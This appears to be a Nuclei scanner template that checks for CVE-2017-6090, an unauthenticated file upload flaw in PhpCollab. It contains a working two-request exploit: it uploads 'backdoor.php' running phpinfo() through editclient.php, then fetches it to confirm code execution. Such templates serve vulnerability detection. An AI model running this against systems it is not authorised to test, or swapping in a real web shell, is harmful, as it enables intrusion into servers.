id: CVE-2017-6090

info:
  name: PhpCollab (unauthenticated) Arbitrary File Upload
  author: pikpikcu
  severity: critical
  tags: cve,cve2017,phpCollab,rce
  reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090

requests:
  - raw:
      - | # REQUEST 1
        POST /clients/editclient.php?id=1&action=update HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
        Accept-Encoding: gzip, deflate
        DNT: 1
        Connection: close
        Upgrade-Insecure-Requests: 1
        Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137
        Content-Length: 237

        -----------------------------154934846911423734231554128137
        Content-Disposition: form-data; name="upload"; filename="backdoor.php"
        Content-Type: application/x-php

        <?php phpinfo(); ?>

        -----------------------------154934846911423734231554128137--

      - | # REQUEST 2
        GET /logos_clients/1.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
        Accept-Encoding: gzip

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "phpinfo()"
          - "PHP Version"
        part: body

      - type: status
        status:
          - 200